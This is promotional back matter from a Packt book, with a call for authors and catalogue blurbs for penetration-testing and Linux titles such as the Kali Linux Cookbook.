Packt is a modern, yet unique publishing company, which focuses on producing quality, cutting-edge 
books for communities of developers, administrators, and newbies alike. For more information, please 
visit our website: www. packtpub.com. 


Writing for Packt 


We welcome all inquiries from people who are interested in authoring. Book proposals should be sent 
to author@packtpub. com. If your book idea is still at an early stage and you would like to discuss 
it first before writing a formal book proposal, contact us; one of our commissioning editors will get in 
touch with you. 


We're not just looking for published authors; if you have strong technical skills but no writing 
experience, our experienced editors can help you develop a writing career, or simply get some 
additional reward for your expertise. 
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Web Penetration Testing with 
Kali Linux 


ISBN: 978-1-78216-316-9 


Paperback: 342 pages 


A practical guide to implementing penetration testing 
strategies on websites, web applications, and standard 
web protocols with Kali Linux 


as 


Learn key reconnaissance concepts needed as 
a penetration tester 


Attack and exploit key features, authentication, 
and sessions on web applications 


Learn how to protect systems, write reports, 
and sell web penetration testing services 


Instant Penetration Testing: Setting 
Up a Test Lab How-to 


ISBN: 978-1-84969-412-4 


Paperback: 88 pages 


Set up your own penetration testing lab using practical 
and precise recipes 


1. 


Learn something new in an Instant! A short, fast, 
focused guide delivering immediate results. 


A concise and clear explanation of penetration 
testing, and how you can benefit from it. 


Understand the architectural underpinnings of 
your penetration test lab. 


Please check www.PacktPub.com for information on our titles 
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Kali Linux Cookbook 
ISBN: 978-1-78328-959-2 Paperback: 260 pages 


Over 70 recipes to help you master Kali Linux for effective 
penetration security testing 


1. Recipes designed to educate you extensively on the 
penetration testing principles and Kali Linux tools 


2. Learning to use Kali Linux tools, such as Metasploit, 
Wire Shark, and many more through in-depth and 
structured instructions 


3. Teaching you in an easy-to-follow style, full of 
examples, illustrations, and tips that will suit 
experts and novices alike 


Linux Utilities Cookbook 
ISBN: 978-1-78216-300-8 Paperback: 101 pages 


Over 70 recipes to help you accomplish a wide variety of 
tasks in Linux quickly and efficiently 


1. Use the commandline like a pro 
2. Pick asuitable desktop environment 


3. Learn to use files and directories efficiently 


Please check www.PacktPub.com for information on our titles 


